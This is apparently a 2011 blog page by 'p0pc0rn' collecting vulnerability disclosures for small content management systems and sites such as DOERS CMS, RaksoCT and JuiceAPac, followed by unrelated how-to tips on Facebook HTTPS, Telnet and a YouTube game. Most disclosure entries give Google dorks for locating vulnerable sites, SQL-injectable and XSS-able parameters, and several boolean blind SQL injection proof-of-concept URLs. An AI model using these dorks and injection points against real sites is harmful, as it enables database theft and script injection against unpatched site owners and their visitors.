DOERS CMS Multiple Vulnerabilities

Title : DOERS CMS Multiple Vulnerabilities
Web : http://www.doers.in/
Found By: p0pc0rn 28/02/2011
Dork : intext:" powered by DOERS" asp

SQL
---

http://site.com/xxxx.asp?id=[SQL]
http://site.com/xxxx.asp?category=[SQL]
and more..

XSS
---
Parameter can be xss'ed

currentPage=[XSS]
categoryname=[XSS]
page=[XSS]
cate=[XSS]
sub=[XSS]
and more..

POC
---

http://www.1337day.com/exploits/15522

thanks,
-p0pc0rn-

Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection

Title : Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection
Web : http://www.hypersoftsolutions.com/
Found by: p0pc0rn 26/02/2011
Filetype: asp
Dork
: intext:"By: HypersoftSolutions.Com"
: inurl :"cms.asp?LinkId="

SQL
---
http://site.com/cms.asp?LinkId=[SQL]
http://site.com/cms.asp?CatId=[SQL]

POC
---
http://site.com/cms.asp?LinkId=1 and 1=1 TRUE
http://site.com/cms.asp?LinkId=1 and 1=0 FALSE

http://www.1337day.com/exploits/15514

thanks,
-p0pc0rn-

WebContent CMS Vulnerable to Multiple SQL Injection

Title : WebContent CMS Vulnerable to Multiple SQL Injection
Web : http://www.interbase.com.my/
Found by: p0pc0rn 26/02/2011
Dork
: intext:"Powered By Interbase WebContent"
: inurl:"cms/layout/Printer.asp?ProductID="
: intext:"Powered By WebContent"

SQL - Microsoft JET Database Engine
------------------------------------

http://site.com/cms/AllProduct.asp?CatID=[SQL]
http://site.com/cms/layout/Printer.asp?ProductID=[SQL]
http://site.com/cms/General.asp?ProductID=[SQL]

http://www.1337day.com/exploits/15513

thanks,
-p0pc0rn-

Teme Technical Solutions CMS Vulnerable to SQL Injection

Title : Teme Technical Solutions CMS Vulnerable to SQL Injection
Web : http://www.temetechsolutions.co.uk
Found by: p0pc0rn 25/11/2011
Dork : intext:"powered by Teme Technical Solutions"

SQL
---
Parameter index.asp?pageId=[SQL]

POC
---

TRUE

FALSE

http://www.1337day.com/exploits/15512

thanks
-p0pc0rn-

How to Protect Your Facebook Account From Being a Victim to MiTM Attacker by Activate HTTPS

How to Protect Your Facebook Account From Being a Victim to MiTM Attacker by Activate HTTPS


1 - Login to your facebook account.

2 - Go to Account > Account Settings

3 - Scroll down and at the Account security line, click change

4 - Tick all boxes.Recommended.

5 - Save and done! Your facebook now will be in Https mode.

Addition

At the same line also(Account security) you can check from where your facebook been logged before.

Duo CMS Vulnerable to Non Persistent XSS

Title: Duo CMS Vulnerable to Non Persistent XSS
Web : http://www.duocms.co.uk/
Found By: p0pc0rn 25/02/2011
Dork : intext:"powered by duo cms" "search"

XSS
---
http://site.com/search/?q=[XSS]

POC
---

thanks.
-p0pc0rn-

PhUse™ CMS Vulnerable to Non Persistent XSS

Title : PhUse™ CMS Vulnerable to Non Persistent XSS
Web : http://www.phusecms.com : http://www.phusecms.co.uk
Found by: p0pc0rn 25/02/2011
Dork : intext:"Powered by PhUse™" : filetype:phuse "searchresults"

XSS
---
http://site.com/searchresults.phuse?q=[XSS]

POC
---

thanks.
-p0pc0rn-

RaksoCT Web Design Vulnerable to Multiples SQL Injection

Title : RaksoCT Web Design Vulnerable to Multiples SQL Injection
Web : http://raksoct.com/
Found By: p0pc0rn 25/02/2011

Blind SQL
----------
1 - Parameter gallery_details.asp?a_id=[Blind SQL]

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE

2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE

3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE

http://www.exploit-db.com/exploits/16241/

Thanks
-p0pc0rn-

JuiceAPac CMS Multiple Vulnerabilities

Title    : Multiple Vulnerabilities in JuiceAPac CMS
Found by: p0pc0rn 24/02/2011
Web     : http://www.juiceapac.com
Dork     : intext:"Powered by JuiceAPac" filetype:cfm
SQL
---

http://site.com/xxxx.cfm?xxx=[SQL]


XSS
---

http://site.com/search.cfm
POST: THE_KEYWORDS=[XSS]&year=[XSS]

http://site.com/news.cfm?NewsID=[XSS]
//maybe other parameter can be xss'ed too.


POC
---

http://www.1337day.com/exploits/15499

thanks
-p0pc0rn-

Alcassoft's SOPHIA CMS Vulnerable to SQL Injection

Title     : Alcassoft's SOPHIA CMS Vulnerable to SQL Injection

Found by : p0pc0rn 24/02/2011

Web      : http://www.alcassoft.com/site/

Dork     : intext:"Powered by Alcassoft SOPHIA"

SQL

---

http://site.com/path/dsp_page.cfm?pageid=[SQL]

POC

---

http://www.exploit-db.com/exploits/16225/

Non Persistent XSS in Samepoint Social Media Search Engine

Title         : Non Persistent XSS in Samepoint Social Media Search Engine
Found by : p0pc0rn 24/02/2011

POC
--------
http://www.samepoint.com/index.php?q=[XSS]


All parameters can be xss'ed.

Update: Fixed

Non-Persistent in Tuugo Free company and business search engine

Title : Non-Persistent in Tuugo Free company and business search engine
Web : http://www.tuugo.com
Found by: p0pc0rn 23/2/2011

XSS
---
Tuugo Search Engine is Vulnerable Non Persistent XSS at parameter search=&nearto=

POC
---

http://site.com/CompaniesForProductByLoc?search=[XSS]&nearto=[XSS]

SQL and XSS in DIY Web CMS

SQL and XSS in DIY Web CMS

found by : p0pc0rn 22/2/2011
web : http://www.mydiyweb.com.my
dork : intext:"powered by DiyWeb"

SQL - Microsoft JET Database Engine error
-----------------------------------------

http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]

XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page

http://www.exploit-db.com/exploits/16205/

thanks
-p0pc0rn-

CMS Powered by sen9.com Multiple Vulnerabilities

CMS Powered by sen9.com Multiple Vulnerabilities

SQL

http://site.com/productDetail.php?P_Id=[sql]
http://site.com/subPage.php?SP_Id=[sql]
http://site.com/videoDetail.php?V_Id=[sql]
http://site.com/journal.php?J_Id=[sql]

screenshot:

XSS

http://site.com/x.php?V_Name=[xss]&SE_Name=[xss]

Directory Listing


there are more vuln found.
I just highlight the high risk vuln

status:reported

thanks
-p0pc0rn-

How to Enable Telnet in Windows 7

1 - Start > Control Panel

2 - Click Programs


3 - At the "Programs and Features", click “Turn Windows features on or off”


4 - New box will pop up..scroll down to find "Telnet Client"..tick and OK! DONE!


alternatively

using cmd prompt

start / w pkgmgr /iu:"TelnetClient"

How to Play Snake in Youtube for fun!

How to Play Snake in Youtube

1 - Go to youtube.com

2 - Find any video

3 - Scroll the timeline to 0:00 and click pause

4 - Hold left arrow button on your keyboard for a while...then push up arrow button..

5 - The snake will appear and u are on game! :D